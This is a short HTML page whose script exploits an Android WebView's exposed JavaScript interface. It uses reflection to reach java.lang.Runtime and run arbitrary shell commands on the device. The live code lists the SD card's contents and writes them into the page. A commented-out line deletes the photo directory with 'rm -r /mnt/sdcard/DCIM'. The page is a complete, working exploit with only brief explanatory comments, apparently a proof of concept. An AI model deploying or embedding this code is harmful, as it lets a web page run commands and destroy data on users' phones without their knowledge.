<html>
<head>
<script>
	function convertBytesToString(inputStream) {
		var contents = "";
		var b;
		while (-1 != (b = inputStream.read())) {
			var ch = String.fromCharCode(b);
			contents += ch;
		}
		return contents;
	}
	// Executes any adb command through the app and displays the results on the webview. 
	function executeCommand(cmd) {
		//  jsInject is the registered java interface Object in MainActivity.java.
		var p_id = jsInject.getClass().forName("java.lang.Runtime").getMethod(
				"getRuntime", null).invoke(null, null).exec(cmd);
		var inputStream = p_id.getInputStream();
		// print the result in a pretty format.
		var cmd_string = cmd.join().replace(",", " ");
		var cmd_return = convertBytesToString(inputStream).replace(/\s/g,
				'<br/>');
		document.write("<b> >" + cmd_string + "</b> <br/>" + cmd_return);
	}

	var ls_command = [ "ls", "/mnt/sdcard" ];
	executeCommand(ls_command);
	/*
		// Remove the default Android Media Gallery directory. 
		// This should on work on rooted devices without requiring any permission. 
		// var very_dangerous_command = [ "rm", "-r", "/mnt/sdcard/DCIM" ];
		// executeCommand(very_dangerous_command);
	 */
</script>
</head>
<body>

</body>
</html>